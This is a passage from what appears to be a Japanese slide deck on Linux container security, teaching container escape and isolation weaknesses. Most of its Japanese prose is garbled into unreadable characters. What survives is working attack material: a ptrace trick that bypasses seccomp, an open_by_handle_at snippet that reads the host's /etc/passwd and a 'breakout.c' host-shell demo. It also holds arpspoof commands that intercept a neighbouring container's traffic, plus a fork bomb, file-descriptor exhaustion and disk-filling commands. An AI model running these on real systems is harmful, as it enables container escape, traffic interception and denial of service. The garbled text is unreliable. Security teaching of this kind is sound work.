  103. TFDDPNQͷCZQBTT wTFDDPNQϕʔεͷ4BOECPY؀ڥ͸Τεέʔϓ͢Δ͜ͱ͕Ͱ͖Δ wmkdir(2)͕ېࢭ͞Ε͍ͯͯ΋ճආͰ͖Δ wઈରʹptrace(2)ͷ࢖༻ΛڐՄͯ͠͸͍͚ͳ͍ʂ wτϨʔα͕ϓϩηεͷγεςϜίʔϧΛมߋͯ͠ϑΟϧλΛόΠύεͰ͖Δ wͨͩ͠-JOVY,FSOFMҎલͷόʔδϣϯͰ௨༻͢Δ

  104. TFDDPNQΛCZQBTTͯ͠ΈΑ͏ root@sample1:~/# ls bypass_seccomp.c root@sample1:~/# mkdir dir Bad system call

    root@sample1:~/# gcc bypass_seccomp.c root@sample1:~/# ./a.out root@sample1:~/# ls -al … drwxr-xr-x 2 root root 4096 Sep 10 12:27 dir # ࡞੒Ͱ͖ͨ

  105. NLEJS  TFDDPNQ Bad system call

  106. HFUQJE  TFDDPNQ QUSBDF getpid(2) Λݺͼग़͢ঢ়ଶʢϨδελʣΛ mkdir(2) Λݺͼग़͢ঢ়ଶʹมߋ NLEJS 

  107. QUSBDF  kill(getpid(), SIGSTOP); syscall(SYS_getpid, SYS_mkdir, "dir", 0777); if (regs.orig_rax

    == SYS_getpid) { regs.orig_rax = regs.rdi; regs.rdi = regs.rsi; regs.rsi = regs.rdx; regs.rdx = regs.r10; ptrace(PTRACE_SETREGS, pid, NULL, &regs); }

  108. -JOVY$BQBCJMJUZ

  109. wSPPUͷΈ͕࢖༻Ͱ͖ΔݖݶΛɺࡉ੍͔͘ޚͰ͖Δ࢓૊Έ wҰ෦͚ͩ෇༩ͨ͠Γ੍ݶͨ͠Γ DBQBCJMJUZ $"1@4:4@"%.*/ $"1@4:4@$)3005 $"1@4:4@153"$& $"1@/&5@3"8 $"1@4:4@#005 NPVOU 

    ͳͲ DISPPU   QUSBDF  3"8ιέοτ QJOHͳͲ SFCPPU  ͱLFYFD@MPBE  -JOVY$BQBCJMJUZ

  110. έΠύϏϦςΟΛମݧ͠Α͏ $ haconiwa start sample3.haco root@sample1:/# ping 8.8.8.8 PING 8.8.8.8

    (8.8.8.8) 56(84) bytes of data. 64 bytes from 8.8.8.8: icmp_seq=1 ttl=63 time=5.54 ms ^C --- 8.8.8.8 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms

  111. έΠύϏϦςΟΛମݧ͠Α͏ root@sample1:/# mount /dev/sda1 /mnt/ root@sample1:/# cat /mnt/etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

    … vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false

  112. έΠύϏϦςΟΛ%301 $ cat sample3.haco … config.capabilities.allow :all config.capabilities.drop "cap_sys_admin" config.capabilities.drop

    "cap_net_raw" …

  113. ݖݶ͕ͳ͍ͷͰ࣮ߦෆՄೳ $ haconiwa start sample3.haco root@sample1:/# ping 8.8.8.8 ping: icmp

    open socket: Operation not permitted root@sample1:/# mount /dev/sda1 /mnt/ mount: permission denied

  114. TZTDBMM LFYFD@MPBE JOJU@NPEVMF pOJU@NPEVMF EFMFUF@NPEVMF PQFO@CZ@IBOEMF@BU ৽͍͠ΧʔωϧΛϩʔυͰ͖Δ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛ࡟আ

    ϋϯυϧʹରԠ͢ΔϑΝΠϧΛ։͘

  115. PQFO@CZ@IBOEMF@BU wϑΝΠϧϋϯυϧ͕ࢀর͢ΔϑΝΠϧΛ։͘γεςϜίʔϧ •CAP_DAC_READ_SEARCH wϑΝΠϧͱσΟϨΫτϦͷಡΈग़͠ͷݖݶνΣοΫΛόΠύε͢Δ wCJOENPVOUͨ͠σΟϨΫτϦͱಉ͡ϑΝΠϧγεςϜʹ͋Δ೚ҙͷϑΝΠϧ ʹΞΫηεՄೳ

  116. PQFO@CZ@IBOEMF@BU int open_by_handle_at( int mount_fd, struct file_handle *handle, int flags);

    struct file_handle { unsigned int handle_bytes; /* Size of f_handle [in, out] */ int handle_type; /* Handle type [out] */ unsigned char f_handle[0]; /* File identifier */ };

  117. PQFO@CZ@IBOEMF@BU struct file_handle { unsigned int handle_bytes; /* Size of

    f_handle [in, out] */ int handle_type; /* Handle type [out] */ unsigned char f_handle[0]; /* File identifier */ }; ઌ಄όΠτʹ͸։͖͍ͨϑΝΠϧͷJOPEF൪߸

  118. PQFO@CZ@IBOEMF@BU $ stat /etc/passwd File: '/etc/passwd' Size: 1724 Blocks: 8

    IO Block: 4096 regular file Device: 801h/2049d Inode: 23125 Links: 1 struct my_file_handle h = { .handle_bytes = 8, .handle_type = 1, // 23125 = 5a 55 .f_handle = {0x55, 0x5a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00} };

  119. PQFO@CZ@IBOEMF@BU $ stat /etc/passwd File: '/etc/passwd' Size: 1724 Blocks: 8

    IO Block: 4096 regular file Device: 801h/2049d Inode: 57824 Links: 1 $ haconiwa start sample4.c root@sample1:/# vim read_passwd.c // Change ex) 57824= e1 e0 .f_handle = {0xe0, 0xe1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00} };

  120. PQFO@CZ@IBOEMF@BU root@sample1:/# gcc read_passwd.c root@sample1:/# ./a.out root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin …

    vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false

  121. ϗετͷγΣϧΛऔΔ root@sample1:/# gcc breakout.c root@sample1:/# ./a.out $ sudo haconiwa start

    demo1.haco

  122. εΠενʔζϞσϧ w ίϯςφͰར༻͞ΕΔηΩϡϦςΟػߏ͸ɺҰ෦ػೳ͕ॏෳ͍ͯ͠Δ΋ͷ΋͋Δ w $BQBCJMJUZͱTFDDPNQͷ྆ํͰಛఆͷγεςϜίʔϧΛېࢭ͍ͯͨ͠Γ w ͋Δػߏ͕#ZQBTT͞Εͯ͠·ͬͯ΋ɺผͷػߏͰ๷͙؇࿨͢Δ w TFDDPNQ͕#ZQBTT͞Εͯ΋$BQBCJMJUZͰ๷͙

  123. ίϯςφͷωοτϫʔΫ

  124. $POUBJOFS/FUXPSL wLXD͸σϑΥϧτઃఆͰ͸ ϒϦοδ͕࡞੒͞ΕΔ eth0 lxdbr0 veth0 eth0 veth0 eth0 $POUBJOFS

    $POUBJOFS #SJEHF 

  125. #SJEHF/FUXPSL $ ip addr show dev lxdbr0 4: lxdbr0: <BROADCAST,MULTICAST,UP,LOWER_UP>

    mtu 1500 qdisc noqueue state UP group default qlen 1000 link/ether fe:20:6c:0f:5b:66 brd ff:ff:ff:ff:ff:ff inet 10.152.207.1/24 scope global lxdbr0 valid_lft forever preferred_lft forever inet6 fd2e:8281:6de5:9841::1/64 scope global valid_lft forever preferred_lft forever inet6 fe80::281a:c0ff:fed1:4b28/64 scope link valid_lft forever preferred_lft forever

  126. $POUBJOFS/FUXPSL wίϯςφΛϗεςΟϯά͍ͯ͠Δ ৔߹ɺΠϯλʔωοτ͔Βτϥ ϑΟοΫΛड͚Δ w΋͠ίϯςφ಺ͷϢʔβʔ͕τϥ ϑΟοΫΛ๣डͰ͖ͨΒʜʁ 4500 0088 7f79 4000

    4006 7980 0a6b 9601 0a6b 969f 8ef6 3039 53dd 5b1c 8615 bd1a 8018 00e5 41f1 0000

  127. "314QPPpOH w"31ͷੑ࣭Λར༻ͯ͠ϧʔςΟϯ άΛมߋ͢Δ w"31ςʔϒϧ ΞυϨεରরද Λ ৴͡ΔࣄͰ੒Γཱ͍ͬͯΔ wԠ౴Λِ૷͢Δ͜ͱʹΑΓޡͬͨ "31ςʔϒϧΛԚછͤ͞Δ͜ͱ͕ Ͱ͖Δ

    4500 0088 7f79 4000 4006 7980 0a6b 9601 0a6b 969f 8ef6 3039 53dd 5b1c 8615 bd1a 8018 00e5 41f1 0000

  128. "315BCMF vagrant@ubuntu-xenial:~$ lxc list attacker | RUNNING | 10.128.193.110 (eth0)

    victim | RUNNING | 10.128.193.231 (eth0) vagrant@ubuntu-xenial:~$ arp -a ? (10.128.193.231) at 00:16:3e:6a:55:5d [ether] on lxdbr0 # attacker ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3 ? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0 # victim ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3

  129. ίϯςφͱૄ௨͕औΕΔ͜ͱΛ֬ೝ vagrant@ubuntu-xenial:~$ lxc exec attacker bash root@test1:~# ping 10.128.193.231 #

    victim ip PING 10.128.193.231 (10.128.193.231) 56(84) bytes of data. 64 bytes from 10.128.193.231: icmp_seq=1 ttl=64 time=0.070 ms ^C --- 10.128.193.231 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.070/0.070/0.070/0.000 ms

  130. "314QPPpOH root@test1:~# arpspoof -t 10.128.193.231 10.128.193.1 &> /dev/null & [1]

    1619 root@test1:~# arpspoof -t 10.128.193.1 10.128.193.231 &> /dev/null & [2] 1620

  131. "315BCMF vagrant@ubuntu-xenial:~$ arp -a ? (10.128.193.231) at 00:16:3e:1d:73:72 [ether] on

    lxdbr0 ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3 ? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0 ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3

  132. ύέοτΛΩϟϓνϟ͢Δ root@attacker:~# tcpdump -i any -vv -w test.pcap vagrant@ubuntu-xenial:~/shared$ curl

    10.128.193.231

  133. औಘͨ͠ύέοτΛݟͯΈΔ $ lxc file pull attacker/root/test.pcap ./ $ tcpdump -X

    tcp port 80 -r test.pcap 0x0000: 4500 0082 2126 4000 3f06 8267 0a80 c101 E...!&@.?..g.... 0x0010: 0a80 c1e7 8f28 0050 ebdb f6f0 89c2 03be .....(.P........ 0x0020: 8018 00e5 985d 0000 0101 080a 001b d7cb .....].......... 0x0030: 001b d7cb 4745 5420 2f20 4854 5450 2f31 ....GET./.HTTP/1 0x0040: 2e31 0d0a 486f 7374 3a20 3130 2e31 3238 .1..Host:.10.128 0x0050: 2e31 3933 2e32 3331 0d0a 5573 6572 2d41 .193.231..User-A 0x0060: 6765 6e74 3a20 6375 726c 2f37 2e34 372e gent:.curl/7.47. 0x0070: 300d 0a41 6363 6570 743a 202a 2f2a 0d0a 0..Accept:.*/*.. 0x0080: 0d0a ..

  134. ͦͷଞͷ"UUBDL4VSGBDF

  135. ENFTHͷόοϑΝϦϯάݺͼग़͠ͱফڈ root@sample1:/# dmesg [ 311.470895] EXT4-fs (sda1): error count since

    last fsck: 28 [ 311.470928] EXT4-fs (sda1): initial error at time 1537860516: htree_dirblock_to_tree:986: inode 542086: block 1069691 [ 311.470944] EXT4-fs (sda1): last error at time 1537928843: htree_dirblock_to_tree:986: inode 278756: block 531449 … root@06399a7a8814:/# dmesg -C root@06399a7a8814:/# dmesg

  136. OFHBUJWFEFOUSZͷେྔੜ੒ root@sample1:/# perl -e 'stat("/$_") for 1..100000000’ vagrant@ubuntu-xenial:~$ sudo slabtop

    Active / Total Objects (% used) : 4172542 / 4182249 (99.8%) Active / Total Slabs (% used) : 197606 / 197606 (100.0%) Active / Total Caches (% used) : 78 / 122 (63.9%) Active / Total Size (% used) : 790487.34K / 794654.96K (99.5%) Minimum / Average / Maximum Object : 0.01K / 0.19K / 8.00K OBJS ACTIVE USE OBJ SIZE SLABS OBJ/SLAB CACHE SIZE NAME 4050564 4050564 100% 0.19K 192884 21 771536K dentry

  137. 'JMF%FTDSJQUPSΛେྔੜ੒ w։͚ΔϑΝΠϧσΟεΫϦϓλͷ਺ʹ͸ ্ݶ͕͋Γɺ/proc/sys/fs/file- maxͰ֬ೝͰ͖Δɻ wίϯςφͷதͷϓϩηε͕͜ͷ஋ͷ਺ ͚ͩϑΝΠϧσΟεΫϦϓλΛ։͘ͱɺ VJEΛڞ༗͍ͯ͠Δ৔߹͸ϗετଆʹ΋ Өڹ͕ੜ͡Δɻ for(i=0; i=99198;

    i++) { sprintf(buf, “/tmp/%d", i); int fd = open(buf, O_CREAT); if( fd == -1 ){ printf("max fd %d\n”, i); break; } } for(;;);

  138. GPSLCPNC $ :(){ :|: & };: $ for i in

    {1..9999}; do sleep infinity & done

  139. σΟεΫ༰ྔ $ fallocate -l 20g big_file • ίϯςφʹσΟεΫ༰ྔ੍ݶ͕ͳ͍৔߹͸େ͖ͳϑΝΠϧΛ࡞੒͢Δ͜ͱͰɺ ϗετͷσΟεΫ༰ྔΛѹഭͤ͞Δ͜ͱ͕Ͱ͖Δɻ $

    dd if=/dev/zero of=tempfile bs=20GB count=10

  140. ·ͱΊ IUUQTqJDLSQ;[

  141. ·ͱΊ w-JOVYίϯςφ͸ෳ਺ͷηΩϡϦςΟػߏʹΑͬͯकΒΕ͍ͯΔ wεΠενʔζϞσϧʢFYTFDDPNQ͕΍ΒΕͯ΋$BQBCJMJUZ͕͋Δʣ wઃఆʹෆඋ͕͋Δͱίϯςφ͔Βϗετɺଞͷίϯςφ΁ӨڹΛٴ΅͢ w-9$΍%PDLFSͳͲ͸σϑΥϧτͰ͜ΕΒͷ߈ܸΛ๷͙ઃఆΛࢪ͍ͯ͠Δ w΋͔ͨ͠͠Βෆඋ͕͋Δ͔΋Ͷ  w$7&

  142. ܅΋ϖύϘͰಇ͔ͳ͍͔ʁ ࠷৽ͷ࠾༻৘ใΛνΣοΫˠ !QC@SFDSVJU